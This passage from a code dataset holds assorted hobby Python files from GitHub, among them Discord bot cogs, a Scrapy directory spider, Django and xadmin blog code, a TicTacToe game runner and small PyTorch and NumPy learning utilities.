parse_timestamp(raw, 'EXIF DateTimeOriginal', 'EXIF SubSecTimeOriginal') or\n        parse_timestamp(raw, 'EXIF DateTime', 'EXIF SubSecTime')\n    )\n\n    raw = {'exifread': raw}\n\n    return raw, {'taken_at': time}\n","repo_name":"mfichman/media-organizer","sub_path":"metadata/exif.py","file_name":"exif.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10016248168","text":"# list files and their metadata\nimport mutagen\nimport os\nfrom mutagen import File\nfrom mutagen.id3 import ID3, APIC, error\n\n\n# use Mutagen to check whether the current file contains a picture; no picture -> True\ndef no_cover_art(file_path):\n    audio = mutagen.File(file_path)\n    if hasattr(audio, \"pictures\"):\n        return len(audio.pictures) == 0\n    return True\n\n\ndef search_music(path):\n    extensions = ['.mp3', '.wav', '.flac']\n    # initialize the music list\n    musics_without_cover = []\n\n    # recursive walk: extension in the list above, and metadata contains no picture\n    def traverse_directory(directory):\n        for root, dirs, files in os.walk(directory):\n            for file in files:\n                file_path = os.path.join(root, file)\n                if file.endswith(tuple(extensions)) and no_cover_art(file_path):\n                    audio = mutagen.File(file_path)\n                    musics_without_cover.append({\n                        \"path\": file_path,\n                        \"artist\": audio[\"artist\"],\n                        \"title\": audio[\"title\"],\n                        \"album\": audio[\"album\"]\n                    })\n\n            # os.walk already descends into subdirectories, so no manual recursion is needed\n\n    traverse_directory(path)\n    return musics_without_cover\n\n\ndef insert(path, image):\n    # image here is the picture bytes, downloaded from the network\n    audio = ID3(path)\n    apic = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Front Cover', data=image)\n    # attach the cover frame and write it back to the file\n    audio.add(apic)\n    audio.save()\n","repo_name":"HisAtri/CoverCover","sub_path":"mod/mulist.py","file_name":"mulist.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31280025667","text":"import discord\nfrom discord.ext import commands\nfrom logs import Logs\nimport re\nfrom Data.database_handler import DataBaseHandler\nfrom get_language import get_language\n\ndatabase_handler = DataBaseHandler(\"database.db\")\n\nmember_re = re.compile(r\"[\\D]\")\n\ndef setup(bot):\n    bot.add_cog(Kick(bot))\n\nclass Kick(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n    \n    \n    @commands.command()\n    @commands.has_permissions(kick_members = True)\n    async def kick(self, ctx, user, *, reason = \"Aucune raison\"):\n        langue = get_language(ctx)\n        user = await self.is_discord_member(user, ctx.guild)\n        if not user.bot:\n            if user == ctx.author:\n                return await ctx.send(langue.kickme)\n\n            if not reason:\n                reason = langue.reason\n            \n            if ctx.author.top_role > user.top_role or ctx.author.id == ctx.guild.owner.id:\n                try:\n                    embed = discord.Embed(title = langue.kicktitle, description = langue.kickdescription, color=0xff8000)\n                    embed.set_author(name = ctx.author, icon_url = ctx.author.avatar_url)\n                    embed.set_thumbnail(url = \"https://discordemoji.com/assets/emoji/BanneHammer.png\")\n                    embed.add_field(name = langue.kickuser, value = user.mention, inline = True)\n                    
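# --- Editor's aside (illustrative): the member_re pattern defined at the top of this
# bot module strips every non-digit, so raw IDs and both Discord mention forms all
# reduce to the same numeric ID:
import re

member_re = re.compile(r"[\D]")
for raw in ("123456789", "<@123456789>", "<@!123456789>"):
    print(int(member_re.sub("", raw)))   # -> 123456789 each time
# --- end of aside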
embed.add_field(name = langue.reason, value = reason, inline = True)\n embed.add_field(name = langue.moderator, value = ctx.author.mention, inline = True)\n await ctx.guild.kick(user, reason = reason)\n await ctx.send(embed = embed)\n return await Logs.logsKick(self, ctx, user, reason)\n except:\n return await ctx.send(langue.errorbotdoesnthavepermissions)\n \n if ctx.author.top_role < user.top_role:\n return await ctx.send(langue.kicktoprole)\n \n if ctx.author.top_role == user.top_role:\n return await ctx.send(langue.kickequalrole)\n else:\n return await ctx.send(langue.kickbot)\n\n \n async def is_discord_member(self, member: str, guild):\n try:\n return guild.get_member(int(member_re.sub(\"\" ,member)))\n except Exception as e:\n return\n","repo_name":"RomainMURIER/discordpy_admin_cmds","sub_path":"kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28856545417","text":"import numpy as np\n\nfrom MyML.CalcGraph.AbstractGraph import CalcGraph\nfrom MyML.DataPipelineTools.DataLoader import DataLoader\nfrom MyML.Helpers.NpExtensions.AxisHelpers import add_axis_if_1d\nfrom MyML.Losses.AbstractLoss import AbstractLoss\nfrom MyML.Optimizers.Optimizer import Optimizer\n\n\nclass BatchGradientOptimizer(Optimizer):\n def __init__(\n self, learning_rate: float, max_batch_size: int, norm_grad: bool = False\n ):\n self.__learning_rate__ = learning_rate\n self.__max_batch_size__ = max_batch_size\n self.__norm_grad__ = norm_grad\n\n def update_node_parameters(\n self, graph_node: CalcGraph, loss: AbstractLoss, data: DataLoader\n ) -> None:\n parameters_to_update = graph_node.get_learnable_parameters()\n data_to_calc_grads, labels = map(\n add_axis_if_1d, data.get_data_batch(self.__max_batch_size__)\n )\n\n grad = np.apply_along_axis(graph_node.calc_grads, -1, data_to_calc_grads)\n grad = add_axis_if_1d(grad)\n if self.__norm_grad__:\n grad /= np.linalg.norm(grad)\n predicted_values = add_axis_if_1d(\n np.squeeze(\n np.apply_along_axis(graph_node.calc_forward, -1, data_to_calc_grads)\n )\n )\n loss_grads = np.apply_along_axis(\n loss.calc_grads, -1, np.dstack((predicted_values, labels))\n )\n grad_shape = grad.shape\n grad = (grad.reshape((grad_shape[0], -1)) * loss_grads).reshape(grad_shape)\n grad = grad.mean(axis=0)\n parameters_to_update -= self.__learning_rate__ * grad\n","repo_name":"kokamido/TryToMakeSmthng","sub_path":"MyML/Optimizers/BatchGradientOptimizer.py","file_name":"BatchGradientOptimizer.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42566117036","text":"pageLog = open(\"actions.log\", \"r\")\nparsedPageLog = open(\"octavePagesBusiness.m\", \"w\", encoding=\"utf-8\")\n\niPages = 20\n\ntimeOctave = [0]\n\npagesRead = []\npagesWrite = []\npagesFree = [i for i in range(iPages)]\n\npagesReadOctave = [0]\npagesWriteOctave = [0]\npagesFreeOctave = [iPages]\n\nminTime = -1\n\nlAll = []\n\nfor line in pageLog:\n\tstate = \"\"\n\tif(\"reading page #\" in line):\n\t\tstate = \"reading\"\n\telif(\"writing page number to page #\" in line):\n\t\tstate = \"pwriting\"\n\t#elif(\"release reader's semaphore #\" in line or\n\t#\t\t\"read the page #\" in line):\n\telif(\"release reader's semaphore #\" in line):\n\t\tstate = \"PWfree\"\n\telif(\"read the page #\" in line):\n\t\tstate = \"Rfree\"\n\tif(state != \"\"):\n\t\tline = line.replace(\"\\n\", \"\")\n\t\ttime = 
int(line[:line.find(\" \")])\r\n\t\tif(minTime == -1):\r\n\t\t\tminTime = time\r\n\t\ttime = time - minTime\r\n\t\tline = line[line.find(\"#\")+1:]\r\n\t\tif(line.find(\".\") >= 0):\r\n\t\t\tpageNumber = int(line[:line.find(\".\")])\r\n\t\telse:\r\n\t\t\tpageNumber = int(line)\r\n\t\t\r\n\t\tif(state == \"reading\"):\r\n\t\t\tif(pageNumber in pagesWrite):\r\n\t\t\t\tpagesWrite.remove(pageNumber)\r\n\t\t\tif(pageNumber in pagesFree):\r\n\t\t\t\tpagesFree.remove(pageNumber)\r\n\t\t\tpagesRead.append(pageNumber)\r\n\t\telif(state == \"pwriting\"):\r\n\t\t\tif(pageNumber in pagesRead):\r\n\t\t\t\tpagesRead.remove(pageNumber)\r\n\t\t\tif(pageNumber in pagesFree):\r\n\t\t\t\tpagesFree.remove(pageNumber)\r\n\t\t\tpagesWrite.append(pageNumber)\r\n\t\telse:\r\n\t\t\tif(pageNumber in pagesWrite):\r\n\t\t\t\tpagesWrite.remove(pageNumber)\r\n\t\t\tif(pageNumber in pagesRead):\r\n\t\t\t\tpagesRead.remove(pageNumber)\r\n\t\t\tif(pageNumber not in pagesFree):\r\n\t\t\t\tpagesFree.append(pageNumber)\r\n\t\t\r\n\t\ttimeOctave.append(time)\r\n\t\tpagesReadOctave.append(len(pagesRead))\r\n\t\tpagesWriteOctave.append(len(pagesWrite))\r\n\t\tpagesFreeOctave.append(len(pagesFree))\r\n\t\t\r\n\t\tlAll.append([state[0], time, pageNumber])\r\n\t\t\r\n_pWrite = []\r\n_pRead = []\r\n_pFree = [i for i in range(iPages)]\r\n\r\n_time = [0]\r\n_poWrite = [0]\r\n_poRead = [0]\r\n_poFree = [iPages]\r\n\t\t\r\n#print(lAll)\r\n#lAll.sort()\t\t# An interesting result awaits whoever uncomments this\r\nlAll = sorted(lAll, key = lambda x: (x[1], x[0]))\r\n#print(\"\\nNEW\\n\", lAll)\r\n\r\noutLog = open(\"bLog.log\", \"w\")\r\n\r\nfor info in lAll:\r\n\tstate = info[0]\r\n\ttime = info[1]\r\n\tpageNumber = info[2]\r\n\tif(\"r\" == state):\r\n\t\tif(pageNumber in _pWrite):\r\n\t\t\t_pWrite.remove(pageNumber)\r\n\t\tif(pageNumber in _pFree):\r\n\t\t\t_pFree.remove(pageNumber)\r\n\t\t_pRead.append(pageNumber)\r\n\telif(\"p\" == state):\r\n\t\tif(pageNumber in _pRead):\r\n\t\t\t_pRead.remove(pageNumber)\r\n\t\tif(pageNumber in _pFree):\r\n\t\t\t_pFree.remove(pageNumber)\r\n\t\t_pWrite.append(pageNumber)\r\n\telse:\r\n\t\tif(pageNumber in _pWrite):\r\n\t\t\t_pWrite.remove(pageNumber)\r\n\t\tif(pageNumber in _pRead):\r\n\t\t\t_pRead.remove(pageNumber)\r\n\t\tif(pageNumber not in _pFree):\r\n\t\t\t_pFree.append(pageNumber)\r\n\t\t\t\r\n\t_time.append(time)\r\n\t_poRead.append(len(_pRead))\r\n\t_poWrite.append(len(_pWrite))\r\n\t_poFree.append(len(_pFree))\r\n\toutLog.write(f\"{time} | page #{pageNumber}, state = {state}\\n\")\r\n\t\noutLog.close()\r\n\r\n#parsedPageLog.write(f\"time = {timeOctave};\\nread = {pagesReadOctave};\\nwrite = {pagesWriteOctave};\\nfree = {pagesFreeOctave};\\n\")\r\nparsedPageLog.write(f\"time = {_time};\\nread = {_poRead};\\nwrite = {_poWrite};\\nfree = {_poFree};\\n\")\r\nparsedPageLog.write(\"figure;\\nhold on;\\nplot(time, read, \\\"r\\\");\\nplot(time, write, \\\"b\\\");\\nplot(time, free, \\\"g\\\");\\nxlabel(\\\"Time, ms\\\")\\nhold off;\")\r\npageLog.close()\r\nparsedPageLog.close()","repo_name":"Leha009/OS","sub_path":"4/1/_PagesStatesFromFolders.py","file_name":"_PagesStatesFromFolders.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36765121272","text":"# -----------------------------------------------------------\r\n# Your Job\r\n# Find the sum of all multiples of n below m\r\n# \r\n# Keep in Mind\r\n# n and m are natural numbers (positive integers)\r\n# m is excluded from the multiples\r\n# \r\n# Examples\r\n# sumMul(2, 9) ==> 2 + 4 + 6 + 8 = 20\r\n# sumMul(3, 13) ==> 3 + 6 + 9 + 12 = 30\r\n# sumMul(4, 123) ==> 4 + 8 + 12 + ... 
= 1860\r\n# sumMul(4, -7) ==> \"INVALID\"\r\n# -----------------------------------------------------------\r\n\r\n\r\ndef sum_mul(n, m):\r\n if n <= 0 or m <= 0:\r\n return \"INVALID\"\r\n mult = 0\r\n for i in range(n, m):\r\n if i % n == 0:\r\n mult += i\r\n return mult\r\n\r\n# or\r\n\r\ndef sum_mul(n, m):\r\n if n <= 0 or m <= 0:\r\n return \"INVALID\"\r\n else:\r\n return sum(range(n, m, n))\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"8 kyu/Sum of Multiples.py","file_name":"Sum of Multiples.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32122044018","text":"import scrapy\n\n\nclass DepartmentSpider(scrapy.Spider):\n name = 'department'\n allowed_domains = ['directory.fit.edu']\n start_urls = ['https://directory.fit.edu/department']\n\n departmentAttributes = [\n {\n 'header': 'Phone',\n 'xpath': 'a/text()',\n 'key': 'phone'\n }, {\n 'header': 'Fax',\n 'xpath': 'text()',\n 'key': 'fax'\n }, {\n 'header': 'Email',\n 'xpath': 'a/text()',\n 'key': 'email'\n }, {\n 'header': 'Website',\n 'xpath': 'a/text()',\n 'key': 'website'\n }, {\n 'header': 'Primary Location',\n 'xpath': 'text()',\n 'key': 'primaryLocation'\n }\n ]\n\n def parse(self, response: scrapy.http.TextResponse):\n departmentUrls = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /div[@class=\"ui list\"]\n /a[@class=\"item\"]\n /@href\n ''').getall()\n # print(departmentUrls)\n\n yield from response.follow_all(departmentUrls, callback=self.parseDepartment)\n\n def parseDepartment(self, response: scrapy.http.TextResponse):\n # print(response.url)\n\n # It's not guaranteed all fields are present on the page\n headers = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /table[@class=\"ui celled table\" and position()=1]\n //th\n /text()\n ''').getall()\n # print(headers)\n\n tdTags = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /table[@class=\"ui celled table\" and position()=1]\n //td\n ''')\n # print(data)\n\n name: str = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /h2\n /text()\n ''').get()\n\n department = {\n 'name': name,\n 'code': response.url[len('https://directory.fit.edu/department/'):]\n }\n\n for attribute in self.departmentAttributes:\n header: str = attribute['header']\n xpath: str = attribute['xpath']\n key: str = attribute['key']\n\n # If we don't see the header, set field to default value\n if header not in headers:\n department[key] = None\n continue\n\n # Otherwise extract the string\n index = headers.index(header)\n value = tdTags[index].xpath(xpath).get()\n department[key] = value\n\n # print(department)\n 
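# --- Editor's aside on the sum_mul kata solved above (illustrative): both versions
# are O(m/n); an O(1) alternative uses the arithmetic-series formula, where k is the
# number of multiples of n strictly below m:
def sum_mul_closed_form(n, m):
    if n <= 0 or m <= 0:
        return "INVALID"
    k = (m - 1) // n             # multiples of n in [n, m)
    return n * k * (k + 1) // 2  # n * (1 + 2 + ... + k)

assert sum_mul_closed_form(2, 9) == 20
assert sum_mul_closed_form(3, 13) == 30
assert sum_mul_closed_form(4, 123) == 1860
# --- end of aside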
yield department\n","repo_name":"XuZhen86/FloridaTechDataSpider","sub_path":"FloridaTechDataSpider/spiders/department_spider.py","file_name":"department_spider.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15418854926","text":"from django.conf.urls import patterns, include, url, handler404, handler500\nfrom ecomstore import settings\nimport os\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nhandler404 = handler404\nhandler500 = handler500\n\nurlpatterns = patterns('',\n url(r'^catalog/$', 'preview.views.home'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('catalog.urls')),\n url(r'^cart/', include('cart.urls')),\n)\n\ndef rel(*x):\n return os.path.join(os.path.abspath(os.path.dirname(__file__).decode('utf-8')).replace('\\\\', '/'), *x)\n\nif not settings.DEBUG:\n urlpatterns += patterns('',\n (r'^static/(?P.*)$', 'django.views.static.serve',\n { 'document_root' : rel('static') }),\n )","repo_name":"ravitejab45/sample-code","sub_path":"ecomstore/ecomstore/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5538592526","text":"# 列出文件及元数据\nimport mutagen\nimport os\nfrom mutagen import File\nfrom mutagen.id3 import ID3, APIC, error\n\n\n# Mutagen检查当前文件是否包含图片,没有图片->True\ndef no_cover_art(file_path):\n audio = mutagen.File(file_path)\n if hasattr(audio, \"pictures\"):\n return len(audio.pictures) == 0\n return True\n\n\ndef search_music(path):\n extensions = ['.mp3', '.wav', '.flac']\n # 初始化音乐列表\n musics_without_cover = []\n\n # 递归遍历:拓展名为上述,且元数据不包含图片\n def traverse_directory(directory):\n for root, dirs, files in os.walk(directory):\n for file in files:\n file_path = os.path.join(root, file)\n if file.endswith(tuple(extensions)) & no_cover_art(file_path):\n audio = mutagen.File(file_path)\n musics_without_cover.append({\n \"path\": file_path,\n \"artist\": audio[\"artist\"],\n \"title\": audio[\"title\"],\n \"album\": audio[\"album\"]\n })\n\n # 递归子目录\n for subdir in dirs:\n subdir_path = os.path.join(root, subdir)\n traverse_directory(subdir_path)\n\n traverse_directory(path)\n return musics_without_cover\n\n\ndef insert(path, image):\n # 这里的image是图片对象,从网络下载\n audio = ID3(path)\n apic = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Front Cover', data=image)\n","repo_name":"HisAtri/CoverCover","sub_path":"mod/mulist.py","file_name":"mulist.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34354789905","text":"from two_player_game import TwoPlayerGame\n\nimport TicTacToe.config as config\nfrom TicTacToe.environment.board import TicTacToeBoard\n\n\nclass TicTacToe(TwoPlayerGame):\n\n def __init__(self, players):\n super(TicTacToe, self).__init__(players=players, config=config)\n\n self.player1.color = config.BLACK\n self.player2.color = config.WHITE\n\n for player in players:\n player.original_color = player.color\n\n def __run__(self, player1, player2):\n \"\"\"\n Runs an episode of the game\n\n :param player1:\n :param player2:\n :return: The original color of the winning player\n \"\"\"\n self.board = TicTacToeBoard()\n players = player1, player2\n\n while True:\n move = players[0].get_move(self.board.copy())\n self.board.apply_move(move, players[0].color)\n\n winner = self.board.game_won()\n if winner is not None:\n 
return config.get_label_from_winner_color(player1, player2, winner)\n\n            players = list(reversed(players))\n\n    def run_simulations(self, episodes, switch_colors=True, switch_players=True):\n        \"\"\"\n        Runs a number of games using the given players and returns statistics over all games run.\n\n\n        If both :param switch_colors and :param switch_players are set, all four possible starting positions will be iterated through.\n        :param episodes: The number of games to run\n        :param switch_colors: Flag specifying whether to alternate the players' colors during play\n        :param switch_players: Flag specifying whether to alternate the starting player\n        :return: The results and average losses per episode where results is a list of the original colors of the winning player ([original_winning_color])\n        \"\"\"\n\n        simulation_players = [self.player1, self.player2]\n\n        results = []\n        losses = []\n\n        for episode in range(episodes):\n            if switch_colors and episode != 0 and episode % 2 == 0:\n                simulation_players[0].color, simulation_players[1].color = simulation_players[1].color, simulation_players[0].color\n\n            if switch_players and episode != 0 and (episode + 1) % 2:\n                simulation_players = list(reversed(simulation_players))\n\n            winner = self.__run__(simulation_players[0], simulation_players[1])\n            player_losses = []\n            for player in simulation_players:\n                loss = player.register_winner(winner)\n                if loss is not None:\n                    player_losses.append(loss)\n\n            losses += player_losses\n            results.append(winner)\n\n        for player in simulation_players:\n            player.color = player.original_color\n\n        return results, losses\n\n","repo_name":"masus04/Deep-Reinforcement-Learning-for-Boardgames","sub_path":"TicTacToe/environment/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"20471046236","text":"'''\nThe file holds the architecture of the models involved.\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n'''\nBinary classification net that separates negative / positive character samples\n'''\n\nclass BinaryClassNet(nn.Module):\n    def __init__(self):\n        super(BinaryClassNet, self).__init__()\n        self.conv1 = nn.Conv2d(3, 8, 5)\n        self.conv2 = nn.Conv2d(8, 16, 5)\n        self.conv3 = nn.Conv2d(16, 36, 5)\n        self.fc1 = nn.Linear(36 * 2 * 2, 60)\n        self.fc2 = nn.Linear(60, 30)\n        self.fc3 = nn.Linear(30, 2)\n\n    def forward(self, x):\n        x = self.conv1(x)\n        x = F.relu(x)\n        x = F.max_pool2d(x, 2, 2)\n        x = F.relu(self.conv2(x))\n        x = F.max_pool2d(F.relu(self.conv3(x)), 2, 2)\n        x = x.view(-1, self.num_flat_features(x))\n        x = F.relu(self.fc1(x))\n        x = F.relu(self.fc2(x))\n        x = self.fc3(x)\n        return x\n\n    def num_flat_features(self, x):\n        size = x.size()[1:]\n        num_features = 1\n        for s in size:\n            
num_features *= s\n return num_features\n\n\ndef make_models():\n\n binclass = BinaryClassNet().double()\n binclass.load_state_dict(torch.load(\n \"D:\\Projects\\ArtifIQ\\channel_detection\\OCR\\Channel_Name_Num\\Back-end\\Saved_Model\\ClassificationNetCPU.pt\"))\n\n classNet = ClassificationNet().double()\n classNet.load_state_dict(torch.load(\n \"D:\\Projects\\ArtifIQ\\channel_detection\\OCR\\Channel_Name_Num\\Back-end\\Saved_Model\\MNISTNetCPU.pt\"))\n\n return (binclass, classNet)\n","repo_name":"rustagiadi95/OCR-sliding_window-pytorch","sub_path":"Processes/back-end/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31163408784","text":"import discord\nimport os\nimport datetime\nimport asyncio\nfrom discord.ext import commands, tasks\n\nclass Sinfo(commands.Cog, name=\"serverinfo\"):\n def __init__(self, client):\n self.client = client\n\n @commands.Cog.listener()\n async def on_ready(self):\n print('cogs loaded for serverinfo')\n\n\n @commands.command(aliases=['guildinfo'], usage='')\n @commands.guild_only()\n async def serverinfo(self, ctx, *, guild_id: int = None):\n if guild_id is not None and await self.client.is_owner(ctx.author):\n guild = self.client.get_guild(guild_id)\n if guild is None:\n return await ctx.send(f'Invalid Guild ID given.')\n else:\n guild = ctx.guild\n\n roles = [role.name.replace('@', '@\\u200b') for role in guild.roles]\n\n embed = discord.Embed(color = discord.Color.dark_magenta())\n embed.title = guild.name\n embed.add_field(name='ID', value=guild.id,inline=False)\n embed.add_field(name='Owner', value=guild.owner,inline=False)\n if guild.icon:\n embed.set_thumbnail(url=guild.icon_url)\n\n embed.add_field(name='Created', value=guild.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"),inline=False)\n embed.add_field(name='region', value=guild.region,inline=False)\n embed.add_field(name='server owner', value=guild.owner.name, inline=False)\n embed.add_field(name='owner status', value=guild.owner.status, inline=False)\n embed.add_field(name='Categories', value=len(guild.categories))\n embed.add_field(name='Text Channels', value=len(guild.text_channels))\n embed.add_field(name='Voice Channels', value=len(guild.voice_channels))\n embed.add_field(name='Emotes', value=len(guild.emojis) ,inline=False)\n \n embed.add_field(name='Roles', value=', '.join(roles) if len(roles) < 10 else f'{len(roles)} roles', inline=False)\n embed.set_footer(text=f\"requested by {ctx.author}\", icon_url=ctx.author.avatar_url)\n # e.set_footer(text='Created').timestamp = guild.created_at\n await ctx.send(embed=embed)\n\n\n\ndef setup(client):\n client.add_cog(Sinfo(client))","repo_name":"ChitogeOwO/Discordpy-Rewrite-Bot","sub_path":"cogs/serverinfo.py","file_name":"serverinfo.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2736527220","text":"import xadmin\nfrom xadmin.filters import manager\nfrom xadmin.filters import RelatedFieldListFilter\nfrom xadmin.layout import Row, Fieldset, Container\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom .models import Post, Category, Tag\nfrom .adminforms import PostAdminForm\nfrom blog.base_admin import BaseOwnerAdmin\n\n\nclass PostInline:\n form_layout = (\n Container(\n Row(\"title\", \"desc\"),\n )\n )\n extra = 1 # 控制额外多几个\n model = 
Post\n\n@xadmin.sites.register(Category)\nclass CategoryAdmin(BaseOwnerAdmin):  # Category\n    # inlines = [PostInline, ]\n    list_display = ('name', 'status', 'is_nav', 'created_time', 'post_count')\n    fields = ('name', 'status', 'is_nav')\n\n    def post_count(self, obj):\n        return obj.post_set.count()\n\n    post_count.short_description = '文章数量'\n\n@xadmin.sites.register(Tag)\nclass TagAdmin(BaseOwnerAdmin):  # Tag\n    list_display = ('name', 'status', 'created_time')\n    fields = ('name', 'status')\n\n\nclass CategoryOwnerFilter(RelatedFieldListFilter):\n    \"\"\"Custom filter that only shows the current user's categories\"\"\"\n\n    title = '分类过滤器'\n    parameter_name = 'owner_category'\n\n    def lookups(self, request, model_admin):\n        return Category.objects.filter(owner=request.user).values_list('id', 'name')\n\n    def queryset(self, request, queryset):\n        category_id = self.value()\n        if category_id:\n            return queryset.filter(category_id=self.value())\n        return queryset\n\n    @classmethod\n    def test(cls, field, request, params, model, admin_view, field_path):\n        return field.name == 'category'\n\n    def __init__(self, field, request, params, model, model_admin, field_path):\n        super().__init__(field, request, params, model, model_admin, field_path)\n        # re-fetch lookup_choices, filtering by owner\n        self.lookup_choices = Category.objects.filter(owner=request.user).values_list('id', 'name')\n\n\nmanager.register(CategoryOwnerFilter, take_priority=True)\n\n@xadmin.sites.register(Post)\nclass Postadmin(BaseOwnerAdmin):  # post admin\n    form = PostAdminForm\n    list_display = [\n        'title', 'category', 'status',\n        'created_time', 'operator', 'owner'\n    ]\n    list_display_links = []\n\n    list_filter = ['category']\n    search_fields = ['title', 'category__name']\n\n    actions_on_top = True\n    actions_on_bottom = True\n\n    # edit page\n    save_on_top = True\n    exclude = ('owner',)\n\n    # fields = (\n    #     ('category', 'title'),\n    #     'desc',\n    #     'status',\n    #     'content',\n    #     'tag',\n    # )\n    form_layout = (\n        Fieldset(\n            '基础信息',\n            Row(\"title\", \"category\"),\n            'status',\n            'tag',\n        ),\n        Fieldset(\n            '内容信息',\n            'desc',\n            'content',\n            'is_md',\n            'content_ck',\n            'content_md',\n        )\n    )\n    # fieldsets = (\n    #     ('基础配置', {\n    #         'description': '基础配置描述',\n    #         'fields': (\n    #             ('title', 'category'),\n    #             'status',\n    #         ),\n    #     }),\n    #     ('内容', {\n    #         'fields': (\n    #             'desc',\n    #             'content',\n    #         ),\n    #     }),\n    #     ('额外信息', {\n    #         'classes': ('wide',),\n    #         'fields': ('tag', ),\n    #     })\n    # )\n\n    def operator(self, obj):\n        return format_html(\n            '<a href=\"{}\">编辑</a>',\n            reverse('xadmin:myblog_post_change', args=(obj.id,))\n        )\n    operator.short_description = '操作'\n\n    # def save_model(self, request, obj, form, change):\n    #     obj.owner = request.user\n    #     return super(Postadmin, self).save_model(request, obj, form, change)\n    #\n    # def get_queryset(self, request):\n    #     qs = super(Postadmin, self).get_queryset(request)\n    #     return qs.filter(owner=request.user)\n\n    # @property\n    # def media(self):\n    #     # xadmin is based on Bootstrap; importing this would clash with the page styles, demo only\n    #     media = super().media\n    #     media.add_js(['https://cdn.bootcss.com/bootstrap/4.0.0-beta.2/js/bootstrap.bundle.js'])\n    #     media.add_css({\n    #         'all': (\"https://cdn.bootcss.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css\", ),\n    #     })\n    #     return media\n\n# @xadmin.sites.register(LogEntry)\n# class LogEntryAdmin(BaseOwnerAdmin):\n#     list_display = ['object_repr', 'object_id', 'action_flag', 'user', 'change_message']\n","repo_name":"wangjun-alt/Blog_Online","sub_path":"myblog/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25218772339","text":"from django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.db.models import Q\n\nfrom api.models import Pouzivatel, Sprava, Miestnost, Post\nfrom api.serializers import UserSerializer, MyTokenObtainPairSerializer, MessageSerializer, MiestnostSerializer, \\\n PostSerializer\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\nclass PouzivatelViewSet(viewsets.ModelViewSet):\n queryset = Pouzivatel.objects.all()\n serializer_class = UserSerializer\n\n # Add this code block\n def get_permissions(self):\n permission_classes = []\n if self.action == 'create':\n permission_classes = [AllowAny]\n elif self.action == 'retrieve' or self.action == 'update' or self.action == 'partial_update':\n permission_classes = [AllowAny]\n elif self.action == 'list' or self.action == 'destroy':\n permission_classes = [AllowAny]\n return [permission() for permission in permission_classes]\n\n\nclass SpravaViewSet(viewsets.ModelViewSet):\n queryset = Sprava.objects.all()\n serializer_class = MessageSerializer\n\n\ndef message_view(request, sender, receiver):\n if request.method == \"GET\":\n messages = Sprava.objects.filter(\n Q(odosielatel_id=sender, prijmatel_id=receiver) | Q(odosielatel_id=receiver, prijmatel_id=sender)).order_by(\"-timestamp\")[0:10]\n serializer = MessageSerializer(messages, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\ndef message_list(request, user):\n if request.method == \"GET\":\n messages = Sprava.objects.filter(Q(odosielatel_id=user) 